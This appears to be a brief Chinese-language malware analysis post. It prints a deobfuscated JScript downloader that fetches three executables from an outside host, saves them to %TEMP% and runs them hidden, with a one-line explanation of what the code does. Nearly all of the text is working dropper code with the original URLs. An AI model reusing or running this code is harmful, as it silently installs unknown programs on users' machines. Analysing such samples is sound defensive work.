解密后的代码如下,作用是从三个网址下载三个exe文件,然后隐藏运行这三个exe文件。
function dl(fr, fn, rn) {
var ws = new ActiveXObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + fn;
var xo = new ActiveXObject("MSXML2.XMLHTTP");
xo.onreadystatechange = function() {
if (xo.readyState === 4) {
var xa = new ActiveXObject("ADODB.Stream");
xa.open();
xa.type = 1;
xa.write(xo.ResponseBody);
xa.position = 0;
xa.saveToFile(fn, 2);
xa.close();
};
};
try {
xo.open("GET", fr, false);
xo.send();
if (rn > 0) {
ws.Run(fn, 0, 0);
};
} catch (er) {};
};
dl("http://picturesoflife.de/document.php?id=54505C5E5551545653545D5D51552415154A070B09&rnd=4175521", "59331912.exe", 1);
dl("http://picturesoflife.de/document.php?id=54505C5E5551545653545D5D51552415154A070B09&rnd=9321702", "52767920.exe", 1);
dl("http://picturesoflife.de/document.php?id=54505C5E5551545653545D5D51552415154A070B09&rnd=8939333", "27690561.exe", 1);
内容全部来源于网络收集,如有侵权,请联系网站删除:QQ:24596024